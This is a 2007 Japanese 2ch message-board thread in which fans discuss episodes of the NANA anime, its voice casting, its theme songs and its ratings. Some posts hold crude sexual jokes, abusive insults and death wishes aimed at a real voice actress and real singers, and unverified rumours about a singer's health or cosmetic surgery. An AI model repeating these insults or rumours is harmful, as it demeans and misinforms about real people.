116 :風の谷の名無しさん@実況は実況板で:2007/01/14(日) 14:41:19 ID:rbnmKzyd
>>100

なんか、誰でもモテ期っていうのがあるらしくて
ハチは、その時期だったんじゃない
友達もある時期、モテまくりで、だれでもすぐやってたな
カラオケでナンパされて、トイレでやっちゃったりとか
まあ、そんな子も今では一児の母、旦那は新宿でナンパされた年下男

117 :風の谷の名無しさん@実況は実況板で:2007/01/14(日) 15:44:17 ID:o+A5xT/v
>>116
俺は一度ももてた次期なんてないけどナー'`,、('∀`) '`,、

118 :名無しさん:2007/01/14(日) 17:19:27 ID:inaEZTbI
先週の放送で土屋アンナさんを見たけど、なんだか「マリア様が見てる」のサブキャラ佐藤聖(白薔薇 ロサ・ギガンティア)みたいだった。

119 :風の谷の名無しさん@実況は実況板で:2007/01/14(日) 18:52:38 ID:VkoldvR0
その気がないうちにモテ期終わっちゃった

120 :風の谷の名無しさん@実況は実況板で:2007/01/14(日) 20:09:09 ID:rbnmKzyd
>>117

まだなんじゃない?これからあるのかもしれないよ。

121 :風の谷の名無しさん@実況は実況板で:2007/01/14(日) 22:55:54 ID:BBundVYl
819 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2007/01/14(日) 22:40:18 ID:THK6qXKs0
タイアップならドラマかNANAみたいな一般人が見るようなアニメにしてほしかった
あとわざわざ荒らしに来てるオタクはそっちのアンチスレへ帰ってくれ


NANAにとっても合う曲だそうです。
http://www.youtube.com/watch?v=SugE6T3AV3Q

感想はこちらまで
【排泄物】ジン【嘔吐物】 5曲目
http://music7.2ch.net/test/read.cgi/musicjg/1165405140/

122 :風の谷の名無しさん@実況は実況板で:2007/01/15(月) 00:51:42 ID:bmox9UbX
♂♀オサセ♂♀は  所詮オサセ

   股の乾かない所が 都合よい

123 :風の谷の名無しさん@実況は実況板で:2007/01/15(月) 17:38:54 ID:X/EP/3Kn
来週のNANAは絵コンテ=青山浩行(時をかける少女・作画監督)

だから要チェックやで


124 :風の谷の名無しさん@実況は実況板で:2007/01/15(月) 21:12:16 ID:/wDLB0YM
東京タワーに章司出てる

125 :風の谷の名無しさん@実況は実況板で:2007/01/15(月) 22:12:40 ID:s5IlyYy4
レイラ〜〜

怒ってオナニー♪

レイラ〜〜

ふざけてオナニー♪

126 :風の谷の名無しさん@実況は実況板で:2007/01/15(月) 22:51:25 ID:SozegNY7
人気あんの?
http://vista.jeez.jp/img/vi6884842094.jpg

127 :風の谷の名無しさん@実況は実況板で:2007/01/16(火) 00:35:47 ID:Q+Fx8ReO
そりゃあ一般的には人気ある方だぞ

128 :風の谷の名無しさん@実況は実況板で:2007/01/16(火) 02:10:31 ID:AlEyhBHq
>>125
安斉肇乙

129 :風の谷の名無しさん@実況は実況板で:2007/01/17(水) 14:06:59 ID:YGRcu0c4
もう前回の話忘れた。

130 :風の谷の名無しさん@実況は実況板で:2007/01/17(水) 14:27:01 ID:OHmu298a
>>129
ナナはハチから暫く逃げまわってたけど、
勇気を出して久しぶりに帰宅したらハチが荷物ごと消えていた。
手紙だけを残して…。

今日のハチはシロガネーゼになってるらしいよ。

131 :風の谷の名無しさん@実況は実況板で:2007/01/17(水) 14:49:31 ID:YGRcu0c4
わざわざサンクス。そういや先週淳子の部屋でそこまでやったっけ。
前回の放送から空き過ぎだ全く。

132 :風の谷の名無しさん@実況は実況板で:2007/01/17(水) 15:09:22 ID:aGkyxxkG
DVDは売れてんの  ?

133 :風の谷の名無しさん@実況は実況板で:2007/01/17(水) 21:08:05 ID:Jf/YX8mh
今日の見所は
章司
ナオキ
ナガシ

134 :風の谷の名無しさん@実況は実況板で:2007/01/17(水) 21:30:55 ID:TX1KHngf
確かに。

135 :風の谷の名無しさん@実況は実況板で:2007/01/17(水) 22:16:17 ID:DCZX0Fy+
やっとストーリー再開か

136 :風の谷の名無しさん@実況は実況板で:2007/01/17(水) 23:54:45 ID:ERBwitHc
真ん中にはN
MANKO

137 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 00:09:28 ID:RWVvzH6Y
ナオキって誰だ
トラネスか?

138 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 00:22:12 ID:EbQRf6ZM
ちょwシンちゃんの歌ほとんどカット!?
感動のシーンなのに・・・

139 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 00:22:48 ID:FrWnjTc2
レイラテラウゼー!
OPがまたナナ(土屋)に戻って良い塩梅だEDもナナでもう最高!
男でナナが好きで平野が嫌いな俺は異端ですか?
絶対平野はミスキャストだよ聞くたびに苛つくし
NANAの世界で一人浮いた声だからさ、萌え儲厨作品だけに出てろよ>平野

140 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 00:24:25 ID:0XMIK9n3
今日の感想

ナオキ かわいいよ ナオキ

141 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 00:24:47 ID:f+g0aUxW
シンの中の人は歌厳禁。

そしてやっぱりレイラが下手。

142 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 00:25:11 ID:EX+lg1FO
悔しいなぁ…なんでこんなアニメ見て泣いてんだ俺…悔しいなぁ…
きっと歳取って涙腺弱くなってるだけなんだと思うんだけど悔しい

143 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 00:26:25 ID:AO7dIy7r
シンの歌カットは演出ミスだろw


144 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 00:28:40 ID:LAgu38pH
>>143
お前は中の人の歌を知らんのかwwww

145 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 00:30:41 ID:EX+lg1FO
石田ってそんなにヤヴァイの?
サヴァイブで歌ってたような記憶あるけど。

146 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 00:30:54 ID:AO7dIy7r
>>144
いや別に中の人が歌わなくてもいいし
ナナやレイラみたいに代役使うとか

そんな予算ないかw

147 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 00:30:56 ID:EVyjwH7t
シンちゃん可愛いなあ

148 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 00:31:47 ID:RXBwiXkX
去年の36話の悲壮なラストシーンから特番・総集編で、間が開いているからいいけど
今日のを続けて観たら多分、前半のハチの能天気さにムカつくと思う。

149 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 00:32:58 ID:LINu5e8n
ナオキの空気の読めなさは異常。
そんなんだから空気扱いなんだよw

150 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 00:33:50 ID:g5kF+z5F
ハチの母ちゃん、普通っぽいのにDQNでびっくりした。
上手くヤったわね。って。

ハチ家族は初めて出て来たの?

151 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 00:36:09 ID:AO7dIy7r
>>150
いや、トラネスのコンサートを見に行くときに
ナナと一緒に帰郷して、そのときに出てる
ちなみに妹はヤマンバw

152 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 00:36:24 ID:EX+lg1FO
>>149
ちゃんと読んでたじゃん。

>>150
ナナと一緒に実家に帰った時に出た。

153 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 00:37:23 ID:OX9mSFLB
一体なんなんだこの進行は?

周囲に流されるヤリマンも幸運に恵まれるのは
実はヤリチンバンドマンがいい人だからって

何?

154 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 00:38:48 ID:QMeSVbSs


http://ja.wikipedia.org/wiki/NANA%E3%81%AE%E7%99%BB%E5%A0%B4%E4%BA%BA%E7%89%A9

16巻までのネタバレ! ハチとタクミのこどもは皐という女の子らしい。




155 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 00:40:52 ID:f+g0aUxW
なんかハチとナオキがくっつくのが一番良いんじゃね??
うるさそうだけど無害。

つかハチ親の反応が一番ありえん。なにあれ。
ここはちゃんと結婚に関して親との真面目なイベント入れるべきだろ。
余計にハチが全てにおいて理不尽なほど恵まれてるように見えるよ。

156 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 00:44:09 ID:g5kF+z5F
>>151>>152
レス有り難う。
姉妹達も見てみたいな、今度タクミと会うみたいだから見れるかも。

ナオキはテンションあれだけど終始まともだったな。
ナナは言動がやたら可愛かった。
ノブは髪下ろしたせいか、作画のせいかやたら可愛かった。

157 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 00:44:40 ID:AO7dIy7r
>>155
タクミが正式に挨拶に行くって言ってたじゃん
あんな事前報告だけで、その感想の方がおかしいと思うよ。


158 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 00:45:14 ID:FrWnjTc2
取り敢えずナオキのシーンカットされてて良かった
レイラの声を聞くだけでも不快なんで、出番が削られてざまぁみろって感じだm9(^Д^)プギャー
ナナさえ良ければいいんだよ、レイラなんて要らない

159 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 00:50:27 ID:iiOn1i2h
↑もちつけ、それはシンだ

160 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 00:54:47 ID:obNuBQZr
ハチ親の反応は、娘の本質イヤって程、知ってるからじゃ?

161 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 02:52:33 ID:YgUEtd34
今日映画のNANA2で、シンの『何が有っても味方だよ』という台詞に泣き、アニメでまた同じ台詞で泣かされた私が来ましたよ(^ω^)

162 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 03:21:13 ID:CXKi1zfy
このスレを見ている人はこんなスレも見ています。(ver 0.20)
【NANA】矢沢あい98巻【天ない】 [少女漫画]
〓 NANA2 〓 [映画作品・人]
NANA [キャラネタ]
【名張毒ぶどう酒事件】「犯人は奥西死刑囚以外にいない」「生きたいために無実を訴えてるだけ」 再審取り消しに遺族ら地元関係者 [ニュース速報+]

163 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 03:48:04 ID:JFwbn3zp
>138
 シンちゃんの歌がほとんどカットされてるのは
 シンちゃんが歌ってた歌がクラプトンの「いとしのレイラ」だからでしょ。
 まともにやったら曲の使用料払わなくちゃいけないんじゃないのか?
 むしろ今日の演出はうまく逃げたほうだよ。
  

164 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 05:39:00 ID:L9WrJQua
>>148
間が空いてても十分ムカついたw

165 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 08:18:46 ID:K9QEYhZe
シンが愛しのレイラを歌うかどうかはアニメ開始当初から気になってた。
中の人の事情も聞いたしw
でも>>163の理由でああいう演出になるだろうと予想はついてた。
前回からあきすぎてるからアニメだけの人はあれが愛しのレイラだと
気づかないんじゃね?

166 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 08:29:10 ID:sZTLmTP5
久しぶりに笑えるシーンが多くて良かった
ずっとNTR鬱展開で嫌気さしてたんだけど

しかしOPが変わったからEDもって思ったらOPだけかよ
トリビアも捨てたれたか
てか、アニメはレイラの存在を平野・トリビアごと暗黒史にしようとしてるんじゃないだろうな

もうハチは707には戻らないの?

167 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 10:09:13 ID:EUvJ2fwB
シンちゃん役の声の人の演技に感動してしまった。
ハチと電話中にタクミの声を聴いて全てを悟った後の
「…そういうことか」って声のかすかな震えとか。

168 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 12:12:39 ID:W/WNTFLt
これヤスの妹の詩音とか3人目のナナとか出るとこまで放送するの?

169 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 13:00:13 ID:4Y88RUnH
きりのよさそうな15巻ぐらいまでやると思う


170 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 13:13:38 ID:KOkY59kf
>>168
前に朴が後半に入り云々〜みたいなコメントしてたけどどうなんだろ
とりあえず美雨が出るなら声は桑島キボン

ところでアニメの製作事情みたいのは全然わからないんだけど
コレって視聴率はやたらイイけどDVD売上げは微妙だったりするじゃん?
放映期間もその辺凄く重要だと思うんだけど結局アニNANAはアタリ?コケ?

171 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 14:29:44 ID:FrWnjTc2
>>166
>てか、アニメはレイラの存在を平野・トリビアごと暗黒史にしようとしてるんじゃないだろうな

そうするべきなんだよ、平野は事務所からのゴリ推しでキャスティングされたとしか思えない
そんな萌え儲狙いの低俗声優はいらないんだよ

172 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 15:56:38 ID:oIA4hyvl
NANA見忘れたー!

173 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 16:04:49 ID:NCCJNDJc
低俗声優……カワイソス
出演本数多すぎだとは思うけどな。

37話は見応えがあってよかった。
ふでやす風呂の進化ぶりは特筆。
ストパニファンとしては軽く嫉妬。

174 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 16:57:36 ID:FQIeSJXy
平野というより事務所がw

主題歌に、AYA inspi' REIRAを押し込もうとしたり、映画に別役で押し込もうとしたり(ry

175 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 17:46:15 ID:0EsWN152
243 : ◆N3.7LOnMw2 :2007/01/18(木) 13:19:10 ID:???O
4.5% NTV 23:55 NANA「ハチ、シロガネーゼ」

176 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 17:58:55 ID:0jZe0Gks
声優さんのキャストに銀ちゃんはあるけど美雨や百合はないんでしょ?
これから決めるのか、出てくる前にアニメが終了するのか…。
それはさておき、次回からはナナやレン、ブラストメンバーが沢山出てくれそう♪
すごく楽しみ〜!

177 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 21:05:29 ID:cum2v6PP
>AYA inspi' REIRA



ある意味聴いてみたい

178 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 21:32:29 ID:We0+vDbQ
それマジ話なの??

179 :風の谷の名無しさん@実況は実況板で:2007/01/18(木) 23:14:12 ID:o32WkfEJ
NANA16巻みてない…
NANA2もみてない…

ぶおーん(;ω;)

180 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 01:06:11 ID:Oa8+zgCd
アニメだけ見てりゃいいだろ。

181 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 01:23:53 ID:IvfciZci
レイラとハチとタクミがうざくて仕方ない

182 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 01:43:29 ID:HsPpIR6W
ナナとレンがヨリを戻した辺りまではハチの事をちょっとウザいが良いやつだなと思ってて
結構好きだったんだが、タクミが絡み始めてからは回を追うごとに
更にウザくなっていってどんどん嫌いになってしまった

183 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 09:00:40 ID:uuLPYo6n
シンの声がいいって人は
カヲル君もいいって言うだろうけど
げんしけんのクッチーも聞いてみて

184 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 09:03:58 ID:Qw1bRThg
タクミは何かある裏で何かある・・・と思ってたけど本当に責任感あるヤツでワロタww
ハチは魔女


185 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 11:09:06 ID:H3BgP2J0
>>183
全部好きだよ。
女だけどくじあんDVDボックス買った。

186 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 11:27:36 ID:5UAXIjzi
>>185
ちょwww

オタクが嫌いな荻上です!

特に女オタクが嫌いです!

187 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 11:28:56 ID:5UAXIjzi
普通だったらあの声はクッチーじゃなくってコーサカなんだけどなw

188 ::風の谷の名無しさん@実況は実況板で :2007/01/19(金) 12:36:51 ID:woAyLSS9
>>176
百合出てこなくていい。嫌いだし。
矢沢はAV女優をそういうふうにしか見てないんだなってわかるキャラだし。




189 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 13:07:05 ID:H3BgP2J0
>>186-187
ホモが嫌いなj(ry
クッチーの壊れっぷりは中(声)の人も楽しんでそう。

190 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 15:06:15 ID:ONKG2x2Q
>>183
いや、石田って言ったらナースエンジェルをお薦めするね

191 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 15:56:03 ID:5UAXIjzi
ナースエンジェルって知らないけど
もっとすごいの?
あの人はミステリアスな白い髪の美少年キャラばっかりの希ガス


そういえば商事久しぶりに見たな
幸子とうまくやってんのかな
八と結婚すんのがトラネスの匠ってはっきりしたらあれ以上にファビョるの?
商事ざまあwww


それにしても映画版1の男のキャスティングはひどいな

192 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 15:57:12 ID:2aA4uRxI
>>191
つ 極道くん曼遊記

193 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 17:54:50 ID:E1PAevqj
ナオキの声ってもしかしてどれみふぁどーなつのれっしー?

194 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 18:16:13 ID:08y7ewrx
セラムンSSのフイッシュアイとかはカマ役の女声だったね、石田。

195 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 21:32:47 ID:1JHbiOjE
章司とナオキは完璧空気だねw

196 :風の谷の名無しさん@実況は実況板で:2007/01/20(土) 01:05:27 ID:B+mVfvyk
ナオキ主人公の番外編はすっとばすのかな

197 :風の谷の名無しさん@実況は実況板で:2007/01/20(土) 01:18:08 ID:5+ex1YuJ
ナオキの声優は声が汚い
不快

198 :風の谷の名無しさん@実況は実況板で:2007/01/20(土) 01:40:22 ID:h6dXPrq6
>>196
あれをすっ飛ばされると、ナオキの存在価値はホント・・・

199 :風の谷の名無しさん@実況は実況板で:2007/01/20(土) 15:34:43 ID:ThgtwEAz
ナオキより土屋アンナの歌声の方が耳障りだわ
何あの騒音
パンクじゃなくてノイズだわ

200 :風の谷の名無しさん@実況は実況板で:2007/01/20(土) 16:19:58 ID:T3ImAkNM
平野の声の方がノイズだ

201 :風の谷の名無しさん@実況は実況板で:2007/01/20(土) 20:58:34 ID:4cSKv2wX
EDは好きだけどOP微妙だな

202 :風の谷の名無しさん@実況は実況板で:2007/01/20(土) 21:21:17 ID:OccRTpxk
AYA inspi' REIRA

203 :風の谷の名無しさん@実況は実況板で:2007/01/21(日) 01:26:39 ID:+jO4z07F
今度の土屋アンナのOPはパンクってよりグランジ寄りだよな
涅槃の曲とコードが似てる所有った

204 :風の谷の名無しさん@実況は実況板で:2007/01/21(日) 01:35:29 ID:5w77dV0v
OP早く変わってほしい…
EDはまぁ良い。

205 :風の谷の名無しさん@実況は実況板で:2007/01/21(日) 01:56:07 ID:468BGz4p
いえぁ いえぁ いえぁ いえぁ

206 :風の谷の名無しさん@実況は実況板で:2007/01/21(日) 01:58:05 ID:JR7G1Cvz
>>199>>201>>204
レイラよりマシ

207 :風の谷の名無しさん@実況は実況板で:2007/01/21(日) 12:02:24 ID:Sne/WJez
自分は意外とノブの声が嫌かも。
人気声優だからなんでも賞賛されがちに見えるけど、合ってないと思うし聞き飽きた。


208 :風の谷の名無しさん@実況は実況板で:2007/01/21(日) 13:00:47 ID:GCtqguUf
へえ人気声優なんだ、
ダミ声っぽくて合わないなぁとは思ってた。

209 :風の谷の名無しさん@実況は実況板で:2007/01/21(日) 13:10:50 ID:WOOVxjXv
>>207
ナナノブシーンとか見ると
どっちも最初は違和感あったけど凄く雰囲気出ててイイなあ
と自分は思えるようになったけど

新鮮味がないのにはまぁ同意
主要キャラはハチの人だけ知らなかったけど
思ったより上手くなってってビックリ…最近だと稀なケースかも

210 :風の谷の名無しさん@実況は実況板で:2007/01/21(日) 23:49:36 ID:zHNe1K93
まあノブの人は結構オッサンだしスネ夫だしな

211 :風の谷の名無しさん@実況は実況板で:2007/01/22(月) 03:01:25 ID:NobbmRZc
伊藤ゆなのあの歯がすごい嫌
シルバとかいう小汚い歌手そっくりだし
オリビアの方がレイラっぽい
あんな類人猿をレイラ役にするなんてスタッフと監督は目悪いのかな
歌うまけりゃいいってもんじゃないよ

212 :風の谷の名無しさん@実況は実況板で:2007/01/22(月) 04:22:33 ID:cFCAO52y
>>211
そこまでいくとアニメ関係ないスレチだ

213 :風の谷の名無しさん@実況は実況板で:2007/01/22(月) 07:40:03 ID:c8TcBQPl
http://yaplog.jp/strawberry2/archive/11404
かなりかわいくなってるけど
整形???
てか、なんか引退説や重病説はどうなたの?

214 :風の谷の名無しさん@実況は実況板で:2007/01/22(月) 10:08:35 ID:ZmNA9Psy
>>213
デマ。
入院してたのも一週間程度。

215 :風の谷の名無しさん@実況は実況板で:2007/01/22(月) 11:33:42 ID:c8TcBQPl
けど病名は言ってないよね
妊娠説とガン説とかあったけど
劇やせしたとか
もう歌は歌わないとか

よくわからんな

216 :風の谷の名無しさん@実況は実況板で:2007/01/22(月) 13:51:54 ID:xu6eB1Ee
>>213
茶髪になっただけで全然かわいくなってないじゃん


217 :風の谷の名無しさん@実況は実況板で:2007/01/22(月) 14:14:32 ID:IyTv5tis
ハチが出てこないぞ・・・最近
今どうしているやら・・・

218 :風の谷の名無しさん@実況は実況板で:2007/01/22(月) 14:35:33 ID:IyTv5tis
ノブの子供っていうこともありそうだwww

どうなるんだろう

219 :風の谷の名無しさん@実況は実況板で:2007/01/22(月) 14:50:23 ID:PnJ5PDY0
>>213
低俗声優萌え儲キモヲタは帰れ!そして氏ね!

220 :風の谷の名無しさん@実況は実況板で:2007/01/22(月) 16:49:24 ID:c8TcBQPl
別に平野だけを特別視してるわけじゃない
平野は好きだけどレイラやみさみさにあってると思わん
レイラ役に決まったってニュース見たとき「あーあ」って思ったし
結局事務所や製作スタッフの目論見でしょ
一気に上ると落ちるのも早いからかわいそうだよ
あとは本人がどうがんばるかだと思う

なんでそんなにムキになるのかわからん

221 :風の谷の名無しさん@実況は実況板で:2007/01/22(月) 18:10:48 ID:Ty+keBSy
平野は大嫌いだけど、ここに張り付いてる平野(レイラ)アンチがマジうざい
作品について語れないならスレでも立ててそこで吠えてろ

222 :風の谷の名無しさん@実況は実況板で:2007/01/22(月) 19:48:56 ID:KeBoFsyO
>>215
簡単に治る病気じゃないってのと通院してるってのは本人が言ってた。
後はわからん。
今もどうなってるかわからん。

223 :風の谷の名無しさん@実況は実況板で:2007/01/22(月) 20:54:41 ID:be+70+px
>>221
あと作品語らず平野だけをマンセーしてる声ヲタも

224 :風の谷の名無しさん@実況は実況板で:2007/01/22(月) 21:44:44 ID:GOiRwL9q
>>223
平野マンセーなんて居たっけ??
てかおまいアンチだろ。いい加減該当スレに移動しろ。

225 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 01:49:26 ID:sUkvnxrA
このアニメ見てると「素顔のままで」って言うドラマを思い出す
と言っても中森明菜が「ゆみこ〜」って言ってる場面しか思い出せないんだけど
声が似てる気がする

226 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 02:23:55 ID:nf/gtOQa
平野は不安定なキャラとしては合ってるんだけど
ちょっと浮ついてるんだよなあ
すもものウマ仮面みたいなコミカルな役だと見事にハマるw

227 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 02:29:17 ID:qiSo2dz/
AYA inspi' REIRA

228 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 06:54:17 ID:zTsuww/R
映画のブラスト(中島)アルバム買った!アンナは糞。

トラネスのジャーニー(伊藤)は名曲だが、やっぱオリビアちゃん最高!でもアルバム買わないよーん。

一青窈を買ったから

229 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 07:20:46 ID:M04l5q/C
>>226
る〜んも合ってたキガス。
コレとミサは下手なんじゃなくて合ってない。

230 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 13:40:54 ID:sVBCUKtP
>>229
明らかに事務所のゴリ押しだもんな
主役級キャラじゃないのに唯一顔出ししたし

231 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 14:01:30 ID:IHvBfgvX
平野はツンデレしか合わないんですよ
ほかのキャラは全部鼻声が気になる
はきはきしゃべるキャラじゃないと合わん

232 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 21:14:09 ID:qh2IG0Ym
人の庭荒らす暇あったらてめえの花を咲かせろや

233 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 23:13:23 ID:wzrNlWKz
口調は荒いがいい言葉だなw

234 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 23:39:48 ID:yHNe6AFE
>>232
?

235 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 23:59:10 ID:GgZBVtmc
ハジマタよ
実況スレ人いねえなあ…

236 :風の谷の名無しさん@実況は実況板で:2007/01/25(木) 00:06:11 ID:E2i2mN19
また平野出てんのかよ!(#゚Д゚)ペッ 、
ミスキャストなのに出張るなカス未満が

237 :風の谷の名無しさん@実況は実況板で:2007/01/25(木) 00:27:01 ID:Tbxnrx56
視聴終了、珍しく次回に引っ張ったなあ
いきなりブラスト祭り上げられて、どうなるのよこれから。
ここいらからgdgdになるんだろうな、コレ…
でも、次回も楽しみだ。ナオキにもっと出番を!

238 :風の谷の名無しさん@実況は実況板で:2007/01/25(木) 00:28:23 ID:m27kCluu
これ3月までなん?

239 :風の谷の名無しさん@実況は実況板で:2007/01/25(木) 00:28:41 ID:aNgVwU5a
つかもうナナとハチって出会えないんだけどね。

240 :風の谷の名無しさん@実況は実況板で:2007/01/25(木) 00:29:16 ID:gRUBRiUm
最近本当に涙もろくて困る。なんでこんなアニメで…
ってかブチブチ文句たれながら見てたけど、面白いな。

241 :風の谷の名無しさん@実況は実況板で:2007/01/25(木) 00:29:46 ID:LlvVnRxA
今日の見て思ったんだけどさ、最初の頃のシンちゃんって
なんでレイラの部屋にわざとジッポ忘れたの?

242 :風の谷の名無しさん@実況は実況板で:2007/01/25(木) 00:31:04 ID:NSb9D4oG
ベタながらも横道パターンって感じでわりかしヨカタヨ

243 :風の谷の名無しさん@実況は実況板で:2007/01/25(木) 00:31:25 ID:nd9d1y18
多分ワザと。

244 :風の谷の名無しさん@実況は実況板で:2007/01/25(木) 00:37:20 ID:o7tUVfov
ナナのハチ依存症がやばいな
つーか原作ではもう再開できたのか?

245 :風の谷の名無しさん@実況は実況板で:2007/01/25(木) 00:38:49 ID:ggQznkpy
>>238
青田買いスレでは次クールからはかわぐちかいじ作品
ってあるけどアレ決定なんだっけ…?

246 :風の谷の名無しさん@実況は実況板で:2007/01/25(木) 00:39:08 ID:Tbxnrx56
>>241
レイラに金とは無関係に呼んでもらう為かも
詳しいことは良く覚えてないw

247 :風の谷の名無しさん@実況は実況板で:2007/01/25(木) 00:39:17 ID:daSDJAfD
原作の話は控えてほしいな

248 :風の谷の名無しさん@実況は実況板で:2007/01/25(木) 00:57:01 ID:LlvVnRxA
>>246
ありがd
その頃のシンちゃんてレイラが孤独だと知らない、恋愛感情もないのに
なんでわざと忘れたのか不思議で不思議で(´・ω・`)

249 :風の谷の名無しさん@実況は実況板で:2007/01/25(木) 01:04:25 ID:gRUBRiUm
>>245
月刊ジャンプだかの作品はデスノの後なのかね?
これの後なのかと思ってたが。

250 :風の谷の名無しさん@実況は実況板で:2007/01/25(木) 01:13:50 ID:cS7BZ3L/
少女漫画でここまで胸糞悪いヒロインは初めてかもしれない
(バンドのボーカルじゃない方)

251 :風の谷の名無しさん@実況は実況板で:2007/01/25(木) 01:28:25 ID:cqsTAxRY
>>232
来週楽しみw

58 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)